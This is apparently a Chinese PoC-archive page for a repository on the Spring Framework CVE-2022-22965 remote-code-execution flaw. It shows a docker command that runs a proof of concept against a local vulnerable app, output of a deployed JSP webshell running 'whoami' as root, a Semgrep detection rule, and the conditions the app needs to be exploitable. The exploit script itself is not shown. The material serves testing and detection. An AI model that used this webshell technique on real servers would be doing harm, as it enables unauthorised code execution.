关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
CVE-2022-22965 - CVE-2010-1622 redux
介绍
CVE-2022-22965 - vulnerable app and PoC
---------------------------------------
## Trial & error
```bash
$ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:latest && sleep 5 && python poc.py
```
### Output example
```
rce
sha256:f626a2190dc0790c610afd4f12a4b2482b6a726d671fdac1432275de89c07cd6
1a048e5725f754d331de9491d0750c4c7a163472dea1fd1554edccfd00d7f6e5
deploy <Response [200]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [500]>
webshell http://localhost:8080/tomcatwar.jsp?cmd=whoami
root
```
## Identification with [Semgrep](https://semgrep.dev/)
```bash
$ semgrep --config=semgrep-rule.yml .
```
[Semgrep rule and test cases](https://semgrep.dev/s/DDuarte:cve-2022-22965)
### Output example
```
Findings:
src/main/java/com/example/demo/controller/IndexController.java
cve-2022-22965
Semgrep found a match
14┆ @RequestMapping("/index")
15┆ public void index(EvalBean evalBean) {
16┆
17┆ }
Ran 1 rule on 3 files: 1 finding.
```
## Vulnerable app requirements[^1]
- JDK 9 or above
- Standalone Tomcat (no Embedded Tomcat) with WAR deployment
- Any Spring version before 5.3.18 / 5.2.20 (Spring Boot before 2.5.12 / 2.6.6)
- No blocklist on WebDataBinder / InitBinder
- Parameter bind with POJOs directly (no @RequestBody, @RequestQuery, etc.)
- Writeable file system (e.g webapps/ROOT)
[^1]: Assuming exploits similar to the known PoCs. There might be other gadgets...
## Sources
- https://twitter.com/vxunderground/status/1509170582469943303 / https://github.com/craig/SpringCore0day
- https://github.com/fengguangbin/spring-rce-war
文件快照
[4.0K] /data/pocs/63b46dc547962180597b38a0cb99c918bee13a2c
├── [ 370] Dockerfile
├── [1.6K] poc.py
├── [1.1K] pom.xml
├── [1.7K] README.md
├── [8.0K] semgrep-rule.yml
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] com
└── [4.0K] example
└── [4.0K] demo
├── [4.0K] controller
│ └── [ 686] IndexController.java
├── [ 502] DemoApplication.java
└── [4.0K] model
└── [ 432] EvalBean.java
8 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。